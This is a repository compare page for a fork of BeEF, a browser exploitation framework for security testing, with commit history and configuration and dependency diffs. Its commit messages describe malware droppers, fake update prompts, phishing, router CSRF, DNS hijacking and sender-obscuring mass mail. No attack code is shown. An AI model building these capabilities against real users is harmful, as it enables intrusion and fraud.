Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.3
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.4.8
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

180 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
bcoles
ce2b5293af Add support for Firefox 25 2013-11-05 14:45:27 +10:30
bcoles
05502a3c91 fix bug preventing loading of 'replace_video_fake_plugin' module 2013-11-04 15:52:54 +10:30
Michele Orru
441ccbbfce Merge pull request #941 from gcattani/LcamtufDownload 
Module Update: lcamtuf Download
 2013-10-30 10:31:57 -07:00
gcatt
f1df608f64 Module Update: lcamtuf Download 
Updated Adobe Flash Player URL to the current one.
 2013-10-30 18:29:44 +01:00
Michele Orru
24bf95ff16 Merge pull request #940 from gcattani/FakeFlashUpdate 
Module Update: Fake Flash Update
 2013-10-30 10:15:28 -07:00
gcatt
9987f0781f Module Update: Fake Flash Update 
Updated the prompted picture and part of the module.
 2013-10-30 17:05:01 +01:00
bcoles
41bfb8e995 Fix bug with Unity Web Player detection 
Fix issue #910
 2013-10-17 17:54:16 +10:30
Michele Orru
77950ae680 Merge pull request #938 from gcattani/hasUnity 
Module: Detect Unity Web Player
 2013-10-15 06:53:41 -07:00
gcatt
d4c69f2bfd Module: Detect Unity Web Player 2013-10-15 15:47:47 +02:00
bcoles
8e6751611d Add beef.browser.getPageHead() and beef.browser.getPageBody() 
Update 'Get Page HTML' module to use these functions

Tested on IE6, FF22, C28

Fix issue #518
 2013-10-13 03:37:15 +10:30
bcoles
09443675cc Fix bug in fake_notification_ff module 2013-10-12 00:43:54 +10:30
bcoles
70cac51a5d Add error check for missing dropper 2013-10-11 23:14:56 +10:30
antisnatchor
69ff8c0013 Added rubyzip dependency to core.rb. Fixed a bug in dom.js when attaching applets for IE. 2013-10-10 20:54:29 +01:00
antisnatchor
050da281ac Modified Gemfile. Added missing directory for Firefox Extension dropper module. 2013-10-10 20:47:14 +01:00
antisnatchor
5dd46ffd72 From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension. 2013-10-10 15:18:03 +01:00
antisnatchor
45c51180a6 Completely removed deployJava ro prevent CtP issues on Firefox. 2013-10-09 16:11:27 +01:00
antisnatchor
b280d099f8 From antisnatchor with love. New module: Signed Java Applet dropper (win only for now). 2013-10-08 17:02:02 +01:00
antisnatchor
2c750670d7 fixed doctype error in basic.html (IE only) 2013-10-08 15:21:54 +01:00
antisnatchor
71a67defd4 Added new RESTful API method to bind a local file to a url. Also added "dropper" directory into Social Engineering extension. 2013-10-08 14:08:52 +01:00
bcoles
638e037e56 Remove Java and VLC detection from hook init 2013-10-06 19:17:55 +10:30
Christian Frichot
8033b77b73 Support for Chrome version 30 in browser detection 2013-10-06 17:20:01 +08:00
antisnatchor
2f51deb88a Fixed issue with Social Engineering extension when using an SMTP server without any needed authentication. 2013-10-02 14:53:04 +01:00
antisnatchor
8d44b48768 Added dependency to therubyracer (V8 implementation for Ruby) if the OS is not OSX. 2013-10-02 14:24:22 +01:00
antisnatchor
86d23d3815 Fix issue #662 the Web UI base path can now be configured in the main config.yaml. Web UI JS files are now also minified. 2013-10-01 17:16:46 +01:00
bmantra
a1f102b869 Merge pull request #933 from bmantra/master 
initial commit of the beef bind shellcode
 2013-09-28 12:18:21 -07:00
bmantra
fa95ac5b55 initial commit of the beef bind shellcode 2013-09-28 21:18:23 +02:00
Michele Orru
5980eff047 Merge pull request #931 from DinisCruz/patch-1 
adding info to read me about running beef in windows
 2013-09-27 02:10:45 -07:00
Dinis Cruz
31587f689b adding into to read me about running beef in windows 2013-09-27 00:59:36 +01:00
bcoles
5942138aba Update spyder eye module 
* file error handling
* render the screenshot in the admin UI
* log screenshot filename to master logs
 2013-09-12 18:29:56 +09:30
bcoles
189e6543e0 Fix bug with rendering images from command responses in the admin UI 2013-09-12 18:26:00 +09:30
bcoles
25aca3d291 Update 'command.js' for Spyder Eye module 2013-09-11 15:26:15 +09:30
bcoles
257a310a02 Update 'module.rb' for Spyder Eye module 2013-09-11 15:24:54 +09:30
bcoles
2420d59a72 Update 'config.yaml' for Spyder Eye module 2013-09-11 15:20:19 +09:30
Brendan Coles
66f01ff4e6 Merge pull request #930 from preth00nker/master 
adding generic module to take screenshoots with canvas
 2013-09-10 23:33:37 -07:00
Christian
3f7eec4e28 adding generic module to take screenshoots with canvas 2013-09-09 13:52:13 -05:00
Christian Frichot
1b6159ebeb New Module - Detect Internal IP with WebRTC. See Issue #929 2013-09-08 11:09:57 +08:00
Christian Frichot
df4b0bce5e Supports Chrome 29 detection 2013-09-07 12:56:21 +08:00
Saafan
d872a5a3e7 Merge remote-tracking branch 'origin/master' into Detect-Java 
Conflicts:
	core/main/client/browser.js
 2013-08-20 05:55:27 -04:00
bcoles
f5b86e7894 Add metasploit default path for kali 2013-08-19 12:37:35 +09:30
bcoles
db83cdd086 Add metasploit default path for pentoo - take 2 2013-08-19 12:37:06 +09:30
bcoles
e9e085e9e1 Add metasploit default path for pentoo 2013-08-17 21:56:42 +09:30
Brendan Coles
62a5d5e96c Merge pull request #927 from thefinn93/spellingfix 
Correct minor typo in the default config.yml
 2013-08-11 02:22:52 -07:00
Finn Herzfeld
173178e1d6 Updated text as requested by bcoles 2013-08-11 00:07:59 -07:00
bcoles
f2883e0c94 Fixed typo 
Extra 'i' from vim insert mode
 2013-08-09 13:34:24 +09:30
bcoles
858814c614 Update BeEF core to complete HTTPS support 
Part of issue #745
 2013-08-09 13:28:35 +09:30
bcoles
21417dc3e2 Update BeEF server protocol for multiple modules to use 
`beef.http.https.enable`

Now uses the `beef.net.httpproto` value rather than a hard-coded
protocol string.

Part of issue #745
 2013-08-09 13:21:33 +09:30
Finn Herzfeld
ca8f5d37e1 Corrected minor typo 2013-08-06 17:03:17 -07:00
bcoles
c6314f97cb Update version to beef-0.4.4.7-alpha 2013-08-04 16:45:24 +09:30
Brendan Coles
1a5b21765f Merge pull request #924 from phihag/install-pipeline-instead-of-fifo 
Use a pipe instead of a fifo during installation
 2013-08-04 00:54:26 -07:00
Brendan Coles
9fe27b113f Merge pull request #923 from phihag/install-abort-on-error 
Update install to abort on error
 2013-08-04 00:52:56 -07:00
Saafan
402f4997df Fixing java support by separating Oracle deployement toolkit in a separate file. #786 2013-08-03 16:25:46 -04:00
Philipp Hagemeister
3948750571 Use a pipe instead of a fifo during installation 
bash's anonymous fifos are only available if devfs is mounted.
On a system without /dev mounted (which is perfectly reasonable for a locked-down security testing machine), installing beef fails with (after applying #923)

    install-beef: line 81: /dev/fd/62: No such file or directory

This commit fixes and lets the installation run through.
 2013-08-01 17:33:09 +02:00
Philipp Hagemeister
957510b6d9 Abort on error 
On a (debian) system without sudo, lots of messages rush by, and it's not obvious was fails.
With this change, the log looks like:

    $ bash install-beef
    bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    ======================================
               BeEF Installer
    ======================================

    CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies.

    In rare cases, this may lead to unexpected behaviour or package conflicts on some systems.

    Are you sure you wish to continue (Y/n)?

    Detecting OS..
    Debian/Ubuntu Detected
    Installing Prerequisite Packages..
    install-beef: line 74: sudo: command not found

which is far more informative.
 2013-08-01 17:30:00 +02:00
Christian Frichot
7f64c94e03 New Module - Fake LastPass Dialog 2013-07-21 13:53:44 +08:00
Christian Frichot
82a70fbcd0 Detect LastPass module (except on IE) - #802 2013-07-20 13:58:20 +08:00
Christian Frichot
a22926bc53 Merge remote-tracking branch 'origin/master' 2013-07-08 19:41:10 +08:00
bcoles
2c2b9a85f4 Update browser fingerprinting module firefox signatures 2013-07-08 10:57:02 +09:30
bcoles
dd811ca234 Add proxy detection using http headers to browser details 
Add proxy details to browser log

Part of issue #527

Note: does not work for transparent proxies
 2013-07-08 00:25:49 +09:30
Christian Frichot
acfdf45d16 Merge remote-tracking branch 'origin/master' 2013-07-06 15:10:43 +08:00
bcoles
e88c3c1f86 Add fake_notification_c module 
Part of issue #695
 2013-07-05 01:17:20 +09:30
bcoles
32b48e5172 Add some client-side debugging to browser.js 
Perform minor code formatting changes
 2013-07-04 23:50:34 +09:30
bcoles
b16d7e3563 Add fake_notification_ff module 
Rename fake_notification module to fake_notification_ie
 2013-07-04 23:12:01 +09:30
Christian Frichot
7e73c0a532 Merge remote-tracking branch 'origin/master' 2013-07-04 20:14:29 +08:00
bcoles
1bddb00ec8 Add Replace Video (Fake Plugin) module 
Fix issue #695
 2013-07-04 11:54:52 +09:30
bcoles
9daacd799e Update version to beef-0.4.4.7 2013-07-04 08:20:05 +09:30
bcoles
4fe51dcd28 Update version to '0.4.4.6.1-alpha' bug fix edition 2013-07-04 08:17:17 +09:30
bcoles
af6cf9e5d4 Add Firefox 23 and 24 support for Firefox aurora/beta users 
Firefox 23 ETA August 2013
Firefox 24 ETA September 2013
 2013-07-04 07:39:23 +09:30
BWZ
3705009982 LiveCD - updade bundles during beef update 
Fixes #918
 2013-07-02 18:19:41 +10:00
antisnatchor
7f1473ccbf Added detection for Firefox 22 (and improved detection of FF 21/22 with a new DOM object). 2013-07-01 17:32:00 +01:00
antisnatchor
f869d2924a Fixed an XSS discovered by Mario in the default keylogger. 2013-07-01 15:24:36 +01:00
Christian Frichot
0b1c753bd3 Merge remote-tracking branch 'origin/master' 2013-07-01 16:22:20 +08:00
gcatt
f6ebe9fac0 Revert "Add Unity Web Player detection" 
This reverts commit 696e3715fe.
 2013-07-01 10:11:20 +02:00
Christian Frichot
570a8266ed Merge remote-tracking branch 'origin/master' 2013-07-01 16:10:33 +08:00
gcatt
696e3715fe Add Unity Web Player detection 2013-07-01 10:07:47 +02:00
Christian Frichot
53536d9d86 Merge remote-tracking branch 'origin/master' 2013-07-01 07:04:42 +08:00
bcoles
e61b266921 update version 2013-07-01 00:42:47 +09:30
bmantra
8cf17b01a5 Merge pull request #916 from bmantra/master 
added option to use only LF in the bind shell module for use with Linux
 2013-06-28 11:43:27 -07:00
bmantra
164ff5bea6 added option for LF only, to use with Linux 2013-06-28 20:42:53 +02:00
Michele Orru
6c6a33db50 Merge pull request #915 from Nbblrr/master 
DNS Enumeration modules does not consider the user timeout parameter
 2013-06-28 05:48:54 -07:00
Nbblrr
e95c74b5e1 DNS Enumeration module does not consider the user timeout parameter 2013-06-28 14:33:33 +02:00
Michele Orru
c70fa80468 Merge pull request #911 from gcattani/910-HasUnity 
Add Unity Web Player detection
 2013-06-19 03:06:42 -07:00
gcatt
1be8ec12fd Add Unity Web Player detection 2013-06-18 23:59:43 +02:00
Christian Frichot
0dd499c71a Updated browser detection to capture Chrome under iOS. See Issue #909 2013-06-16 16:19:58 +08:00
Christian Frichot
dab58f0e61 Updated hardware constants better detects and displays pure Nexus phones. Issue #908 2013-06-16 14:49:39 +08:00
Christian Frichot
2e68470d23 Android OS Icon should now display. See Issue #907 2013-06-16 14:27:12 +08:00
Christian Frichot
473f349394 Missing apostrophe in PHP-5.3.9-dos module.rb. This was breaking Rake. Make sure you run rake peeps before pushing! 2013-06-15 13:48:05 +08:00
Christian Frichot
dbebf12d27 Update to browser_filter. See Issue #906 2013-06-15 13:45:24 +08:00
Christian Frichot
96f763b7e0 Chrome 27/28 detection. Fixes Issue #905 2013-06-15 13:41:41 +08:00
bcoles
d40486c391 Add airlive_ip_camera_csrf module 2013-06-14 15:28:35 +09:30
Brendan Coles
d43f443555 Merge pull request #904 from Nbblrr/master 
Add modules for detecting MS Office version and Bitdefender 2012

Fix issue #902
Fix issue #903
 2013-06-13 22:38:37 -07:00
Nbblrr
2b473bfda9 Add module which detect MS Office version. Closes #903 2013-06-14 00:39:39 +02:00
Nbblrr
a2b627c8ae Add module to detect bitdefender 2012. Closes #902 2013-06-14 00:07:00 +02:00
bcoles
dbabb379fb Add Iceweasel detection in browser.js 2013-06-02 05:14:33 +09:30
bcoles
5252bea54a Add Get Form Values module 
This module retrieves the name, type, and value of all input
fields for all forms on the page.
 2013-06-02 05:11:45 +09:30
bcoles
7fdfcc3ef0 Add beef.browser.isA() to avant_steal_history module 
Part of issue #774
 2013-06-02 03:19:05 +09:30
bcoles
3c5b68e112 Add beef.browser.isA() to detect Avant Browser 
Fixes issue #774
 2013-06-02 03:14:29 +09:30
Michele Orru
9e17958268 Merge pull request #900 from james-otten/master 
Added Actiontec Q1000 router CSRF module
 2013-05-31 02:36:40 -07:00
James Otten
f2efa533c8 Added Actiontec Q1000 CSRF module 2013-05-30 15:49:47 -05:00
Christian Frichot
9636cb0972 Updated Gmail detection URL. Fixes #Issue 899 2013-05-28 20:34:56 +08:00
bcoles
1dc59f7b01 Add D-Link ShareCenter command execution exploit module 2013-05-27 13:50:12 +09:30
bcoles
ff620d42f4 Add belkin_dns_csrf DNS hijack module 
Part of issue #538
 2013-05-27 12:50:06 +09:30
bcoles
61e6337046 Remove zenoss_daemon_csrf module 2013-05-27 12:14:27 +09:30
bcoles
639d0611a6 Add command_id to embedded iframe/img IDs for router exploits 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
 2013-05-27 11:56:01 +09:30
bcoles
ab7a62e8a4 Update version 2013-05-27 10:40:58 +09:30
Michele Orru
71f04d82f5 Merge pull request #849 from geefunkmasterpro/master 
Enhancements to Mass Mailer
 2013-05-26 04:58:57 -07:00
bcoles
704b979054 minor syntax changes to php-5.3.9-dos module 2013-05-26 02:48:04 +09:30
bcoles
7aaafc79aa Remove bi-directional communication from IPEC win bindshell module 2013-05-26 02:41:04 +09:30
bcoles
f90ad4a261 Add detection for WebRTC support 2013-05-24 17:06:36 +09:30
bcoles
0dfab0e348 Add EXTRAnet Collaboration Tool Command Execution exploit module 2013-05-24 16:40:02 +09:30
bcoles
018a849e14 Add 'path' argument for beef.dom.createIframeIpecForm() 2013-05-24 14:01:21 +09:30
bcoles
717f63ff0c Add ruby-nntpd Command Execution exploit module 2013-05-24 13:50:04 +09:30
bcoles
9bac6b4fc1 Add support for Firefox 21 2013-05-24 13:47:31 +09:30
bcoles
2dae1d4c07 Add /bin/sh -c to default command 2013-05-22 14:37:01 +09:30
bcoles
7de48ceafb Add GroovyShell Server Command Execution IPEC exploit module 2013-05-22 02:32:27 +09:30
Brendan Coles
8ecdceb928 Merge pull request #894 from sgorbaty/master 
New functionality - detect phonegap plugins
 2013-05-09 01:59:49 -07:00
Sergey Gorbaty
498372aef3 Adding phonegap integration with keychain plugin 2013-05-08 13:18:31 -07:00
Sergey Gorbaty
55d8506960 Added primitive phonegap plugin detection 2013-05-07 17:10:12 -07:00
antisnatchor
8d60c10298 Merge branch 'master' of https://github.com/beefproject/beef 2013-05-07 13:04:19 +02:00
antisnatchor
94d15cd386 Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser. 2013-05-07 13:00:34 +02:00
bcoles
5bbf26abac Add beef.http.dns_port config option 2013-05-06 16:03:17 +09:30
Brendan Coles
5b90c351da Merge pull request #888 from sgorbaty/master 
Adding new features to Phonegap module
 2013-05-05 17:26:31 -07:00
antisnatchor
b501fe7c1a Updated Rack dependency in Gemfile in order to don't create conflicts with the updated Sinatra dependency. 2013-05-04 09:42:40 +01:00
Michele Orru
b28e631500 Merge pull request #889 from 0x1a0ran/master 
Bug fix: cross-origin XHR with "Origin" or "Referrer" header set always return 403.
 2013-05-04 01:30:42 -07:00
Sergey Gorbaty
5722cb2bc1 Added email to contact list 2013-05-03 14:24:23 -07:00
Sergey Gorbaty
0479744dfc added device model detection 2013-05-03 14:14:19 -07:00
Sergey Gorbaty
3dbfdbac7e Adding user prompt 2013-05-03 14:02:53 -07:00
Sergey Gorbaty
d3262d9451 Adding local detection 2013-05-03 13:34:09 -07:00
Sergey Gorbaty
906ca6ccce Cordova detection added 2013-05-03 13:13:24 -07:00
Xiaoran Wang
ea560c3464 Added configurable port for postsql and mysql 2013-05-03 13:01:37 -07:00
Xiaoran Wang
b79402ce5f updated sinatra from 1.3.2 to 1.4.2 to fix the CORS request always return a 403 bug. link here https://github.com/sinatra/sinatra/issues/518 2013-05-03 11:02:11 -07:00
Sergey Gorbaty
1699d52475 adding contact list 2013-05-03 10:09:09 -07:00
antisnatchor
c5d5b99472 Issue #886: The preflight OPTIONS request now allow also the content-type header, required to use a json conten-type with POST requests. 2013-05-02 10:55:16 +01:00
antisnatchor
9915547b19 Issue #886: Added support for preflight OPTIONS request. 2013-05-01 17:19:48 +01:00
antisnatchor
ef2eac26eb Issue #886: Added support for CORS on the Router object. The RESTful aPI can not be called from JS x-domain. 2013-05-01 11:15:21 +01:00
bcoles
09be2db069 Update version to beef-0.4.4.5 2013-05-01 17:53:21 +09:30
bcoles
6da4e2c39c Update version to '0.4.4.4.1-alpha' bug fix edition 2013-05-01 17:49:21 +09:30
bcoles
15c7e64e93 Fix bug with module image result rendering in admin UI 2013-05-01 17:47:00 +09:30
bcoles
91e2b36ce4 Update webcam module so the picture returned as a base64 encoded string 
will be rendered in the admin UI
 2013-05-01 16:44:28 +09:30
bcoles
b82696ead2 Enabled web server imitation by default 
The time has come. This feature has been stable for a while.
 2013-05-01 16:43:26 +09:30
bcoles
7233957664 Update version 2013-04-30 18:56:37 +09:30
bcoles
88678f986c Add 'Debug -> Test Return Image' module 
Part of isse #883
 2013-04-30 18:40:25 +09:30
bcoles
719bb4a20b Fixed malformed YAML in modules/browser/get_visited_domains/config.yaml 2013-04-25 01:37:15 +09:30
antisnatchor
4ea18852f6 Updated eventmachine gem version in Gemfile. 2013-04-21 10:52:46 +01:00
qswain2
c16479a14e Add chrome support to get_visited_domains 
Added chrme implementation based on visipisi
 2013-04-19 01:02:48 -04:00
bcoles
59951959f1 Add Opencart password reset CSRF module 
This module hasn't been tested against an Opencart instance
 2013-04-19 09:18:05 +09:30
bcoles
da763df110 Uncommented several instances of beef.debug() - Part of issue #862 2013-04-17 22:12:35 +09:30
bcoles
4980ca02a6 Add beef.client.debug config property - Part of issue #862 
Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
 2013-04-17 22:05:31 +09:30
Christian Frichot
6e0f7a266e Issue #883. Admin UI will inline display images from the HTML5 webcam module now 2013-04-15 19:28:52 +08:00
Christian Frichot
e3cb7f7a2d #882. New HTML5 WebRTC Webcam Module 2013-04-15 19:20:48 +08:00
Christian Frichot
6e9db43463 Fixes issue #881. Console fix for reviewing previous responses 2013-04-15 19:18:07 +08:00
bcoles
a172362452 Part of issue #862 - Add beef.debug() for client-side debugging 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
 2013-04-15 16:49:01 +09:30
bcoles
55b0bee9ca Re-enable XSS-Rays vectors containing ' charater 
Fix issue #47
 2013-04-14 20:38:41 +09:30
Christian Frichot
950c3d37a7 Fixes Issue #880. Detect Tor update - now works 2013-04-13 14:51:34 +08:00
Christian Frichot
1721d3c263 Fixes issue #879. Console enhancements. 2013-04-13 14:48:40 +08:00
antisnatchor
5585879cca Updated multiple core files to use hook_session_name consistently from the config.yaml file. 2013-04-09 10:25:49 +01:00
Christian Frichot
d855100ac9 Fixes #878 and #758. 2013-04-08 21:52:50 +08:00
Christian Frichot
fad33dfea7 Fixes #877. New IE Fake Notification Bar Module 2013-04-08 19:36:02 +08:00
Christian Frichot
b4732a9438 Fixes #876. Can detect Chrome 26. 2013-04-08 13:08:56 +08:00
antisnatchor
73e291832e Replacing document.location.href with location in xssrays.js. 2013-04-07 15:54:14 +01:00
antisnatchor
85b204f52b Updated beef.hardware component name for consistency. 2013-04-07 13:19:23 +01:00
antisnatchor
78410e28eb Changed attachApplet dom.js method to use <applet> also for Firefox, instead of the <embed> tag. This fixes some issues when running Signed Applets. 2013-04-06 12:30:00 +01:00
antisnatchor
222cff3f1d Added a README file for the JavaPaylod signed applet exploit. 2013-04-06 12:29:05 +01:00
Christian Frichot
2ef1b5bab8 Updates gmail phishing command module. Fixes #873 2013-04-06 15:54:55 +08:00
Christian Frichot
af67c6a8d9 Few enhancements to dom.js. See #870 #871 #872 2013-04-06 15:52:32 +08:00
Christian Frichot
79572a61f0 Renamed webcam_permission_check module 2013-04-06 14:35:21 +08:00
Christian Frichot
2fcdf1038d xntriks updates to webcam_perm_check 2013-04-06 14:32:51 +08:00
Christian Frichot
cca21f1003 Merge pull request #869 from bw-z/master 
Added Webcam Permission Check Module - which I'll then update.
 2013-04-05 23:29:21 -07:00
Christian Frichot
07fe3a9c0e Updates to tabnabbing module to use jQuerys wider event handling. #868 2013-04-04 21:33:43 +08:00
Christian Frichot
69fd3e600c Event log now logs when a zombie comes back online. #867 2013-04-04 21:29:18 +08:00
Christian Frichot
ae98842ad4 Tiny fix to Clippy so it appears properly. #866 2013-04-04 19:37:08 +08:00
bcoles
159ecb5ade Fix malformed YAML in 'deface_web_page_component' module 2013-04-04 00:04:45 +10:30
BWZ
cf4ab9533e Added Webcam Permission Check Module 2013-04-03 09:01:15 +10:00
Christian Frichot
9a23ed758e New getHighestZindex function in beef.dom and updated createIframe beef.dom function. #865 2013-04-02 14:33:57 +08:00
Christian Frichot
389f27360d Slight spelling mistake fix up in the Welcome tab of the Admin UI 2013-04-01 19:51:16 +08:00
Christian Frichot
e8eda3ef99 Minor enhancements to the Admin UI. #864 2013-04-01 11:07:50 +08:00
Saafan
af8018500b Fixing some unit tests 2013-03-31 16:22:58 +02:00
Christian Frichot
22cd68101d Added Bookmarklet to the Welcome Tab in the Admin UI. #863 2013-03-30 17:31:36 +08:00
bcoles
760e7a456e Update version 2013-03-29 15:59:48 +10:30
geefunkmasterpro
66d0e3535b Added fromaddr to mass mailer JSON interface so emails can be sent from 
any address without restart.

Removed fromaddr entry from config.yaml.
 2013-02-27 23:29:08 +11:00
geefunkmasterpro
e79372f8ac Added auth field to config so that emails are harder to track to sender 
Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
 2013-02-27 21:33:48 +11:00
313 changed files with 11087 additions and 896 deletions
Expand all files Collapse all files

14
Gemfile
View File

@@ -9,15 +9,18 @@
# Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.3.2"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "uglifier", "~> 2.2.1"
# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
if !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer", "~> 0.12.0"
end
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -28,6 +31,7 @@ gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
gem "rubyzip", "~> 1.0.0"
# notifications
gem "twitter"

3
README.mkd
View File

@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
$ ./beef
On windows use
$ ruby beef

6
Rakefile
View File

@@ -76,10 +76,10 @@ end
@beef_process_id = nil;
task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..."
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.4.3-alpha
0.4.4.8-alpha

1
beef
View File

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"),

25
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.4.3-alpha'
version: '0.4.4.8-alpha'
debug: false
restrictions:
@@ -27,30 +27,38 @@ beef:
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
# DNS
dns_host: "localhost"
dns_port: 53
web_ui_basepath: "/ui"
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
enable: true
type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
@@ -72,6 +80,7 @@ beef:
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here
extension:
requester:

1
core/bootstrap.rb
View File

@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
